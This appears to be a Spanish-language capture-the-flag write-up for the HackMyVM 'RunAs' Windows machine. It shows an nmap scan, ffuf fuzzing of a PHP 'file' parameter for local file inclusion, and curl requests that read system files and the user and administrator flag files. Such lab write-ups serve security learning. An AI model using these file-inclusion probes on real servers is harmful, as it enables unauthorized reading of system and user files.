cd ~/blog

~/writeups/hmv/117-runas.md

117 - RunAs

easy Windows hmv 28-10-2024
Local File Inclusion (Windows LFI)
hackmyvm.eu/machines/machine.php?vm=RunAs

~1 min de lectura


Enumeramos puertos (máquina Windows 7):

 nmap -sCV -p 80,135,139,445,3389,5357,49152,49153,49154,49155,49156,49157 -oN 02-targeted.txt 192.168.1.35
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-28 19:16 -03
Nmap scan report for 192.168.1.35
Host is up (0.00045s latency).

PORT      STATE  SERVICE       VERSION
80/tcp    open   http          Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-title: Index of /
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
...
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

En el puerto 80, index.php expone un parámetro file:

There is no going back!
?file=

Fuzzeamos buscando LFI de Windows y obtenemos lectura arbitraria de archivos:

 ffuf -u 'http://192.168.1.35/index.php?file=FUZZ' -w ~/Documentos/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -fw 68,70
...
C:/Windows/win.ini      [Status: 200, ...]
c:/php/php.ini          [Status: 200, ...]
c:/WINDOWS/WindowsUpdate.log [Status: 200, ...]
...

En C:/WINDOWS/WindowsUpdate.log aparece el nombre del usuario (runas), así que leemos directamente las flags vía el LFI:

 curl 'http://192.168.1.35/index.php?file=c:/users/runas/desktop/user.txt'
...
HMV{...}
...

 curl 'http://192.168.1.35/index.php?file=c:/users/administrator/desktop/root.txt'
...
HMV{...}
...

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados